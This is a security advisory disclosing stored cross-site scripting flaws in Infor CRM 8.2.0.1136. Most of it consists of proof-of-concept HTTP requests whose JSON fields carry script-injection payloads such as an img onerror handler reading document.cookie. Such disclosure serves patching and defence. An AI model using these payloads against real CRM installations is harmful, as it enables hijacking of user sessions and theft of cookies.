1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174 | Infor CRM 8.2.0.1136 Multiple HTML Script Injection Vulnerabilities
Vendor: Infor
Product web page: http://www.infor.com
Affected version: 8.2.0.1136
Summary: Infor® CRM, formerly Saleslogix, is an award-winning
customer relationship management (CRM) solution that provides
a complete view of customer interactions, so your business can
collaborate and respond promptly and knowledgably to customer
inquiries, sales opportunities, and service requests. Infor CRM
includes a robust suite of sales, marketing, and service capabilities,
to offer businesses of all sizes a fast, flexible, and affordable
solution for finding, winning, and growing profitable customer
relationships.
Desc: Infor CRM suffers from multiple stored cross-site scripting
vulnerabilities. Input passed to several POST/PUT parameters in
JSON format is not properly sanitised before being returned to the
user. This can be exploited to execute arbitrary HTML and script
code in a user's browser session in context of an affected site.
Tested on: Microsoft-IIS/8.5
ASP.NET/4.0.30319
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5308
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5308.php
21.01.2016
---
----------------------------------
Affected parameter(s): description
----------------------------------
PUT /SLXClient/slxdata.ashx/slx/system/-/attachments(%22eUSERA0004IX%22)?_includeFile=false&format=json&_t=1456358980947 HTTP/1.1
Host: intranet.zeroscience.mk
{$updated: "/Date(1456359095000)/", $key: "eUSERA0004IX",…}
"": ""
$descriptor: ""
$etag: "+CgjMLB+0nA="
$httpStatus: 200
$key: "eUSERA0004IX"
$lookup: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/attachments?format=json"
$post: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/attachments?format=json"
$schema: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/attachments/$schema?format=json"
$service: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/attachments/$service?format=json"
$template: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/attachments/$template?format=json"
$updated: "/Date(1456359095000)/"
$url: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/attachments('eUSERA0004IX')"
accountId: null
activityId: null
attachDate: "2016-01-25T00:09:39Z"
contactId: null
contractId: null
createDate: "/Date(1456359095000)/"
createUser: "UUSERA0005W0"
dataType: "R"
defectId: null
description: "<img src=j onerror=confirm(document.cookie) >"
details: {createSource: null}
documentType: null
fileExists: true
fileName: "inforcrm_xss.png"
fileSize: 101722
historyId: null
leadId: null
modifyDate: "/Date(1456359095000)/"
modifyUser: "UUSERA0005W0"
opportunityId: null
physicalFileName: "!eUSERA0004IXinforcrm_xss.png"
productId: null
remoteStatus: null
returnId: null
salesOrderId: null
ticketId: null
url: null
user: {$key: "UUSERA0005W0"}
-----------------------------------------------------------
Affected parameter(s): Description, Location, and LongNotes
-----------------------------------------------------------
POST /SLXClient/slxdata.ashx/slx/system/-/activities?format=json&_t=1456357736977 HTTP/1.1
Host: intranet.zeroscience.mk
{$httpStatus: 200, $descriptor: "", ActivityBasedOn: null, Alarm: false,…}
$descriptor: ""
$httpStatus: 200
AccountId: null
AccountName: null
ActivityAttendees: {}
ActivityBasedOn: null
Alarm: false
AlarmTime: "2016-01-24T22:45:00Z"
AllowAdd: true
AllowComplete: true
AllowDelete: true
AllowEdit: true
AllowSync: true
AppId: null
Attachment: false
AttachmentCount: null
AttendeeCount: 0
Category: "Pleasantville"
ContactId: null
ContactName: null
CreateDate: "/Date(-62135596800000)/"
CreateUser: null
Description: "<img src=zsl onerror=prompt(1) >"
Details: {ForeignId1: null, ForeignId2: null, ForeignId3: null, ForeignId4: null, ProjectId: null,…}
ChangeKey: null
CreateSource: null
ForeignId1: null
ForeignId2: null
ForeignId3: null
ForeignId4: null
GlobalSyncId: null
ProjectId: null
Tick: null
UserDef1: null
UserDef2: null
UserDef3: null
Duration: "0"
EndDate: "/Date(1456359315286)/"
LeadId: null
LeadName: null
Leader: {$key: "UUSERA0005W0", $descriptor: "Userovich, User"}
$descriptor: "Userovich, User"
$key: "UUSERA0005W0"
Location: "<img src=zsl onerror=prompt(2) >"
LongNotes: "<img src=zsl onerror=prompt(3) >"
ModifyDate: "/Date(-62135596800000)/"
ModifyUser: null
Notes: "Zero Science Lab"
OpportunityId: null
OpportunityName: null
OriginalDate: "/Date(1456358415286)/"
PhoneNumber: null
Priority: "1"
ProcessId: null
ProcessNode: null
RecurIterations: 0
RecurPeriod: 0
RecurPeriodSpec: 0
RecurSkip: null
RecurrenceState: "rsNotRecurring"
Recurring: false
Resources: {}
Rollover: false
StartDate: "2016-01-25T00:00:05Z"
TicketId: null
TicketNumber: null
Timeless: true
Type: "atToDo"
UserActivities: {}
$url: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/userActivities?format=json&where=Activity.Id%20eq%20%27VUSERA000CZ7%27"
UserNotifications: {}
$url: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/userNotifications?format=json&where=Activity.Id%20eq%20%27VUSERA000CZ7%27"
|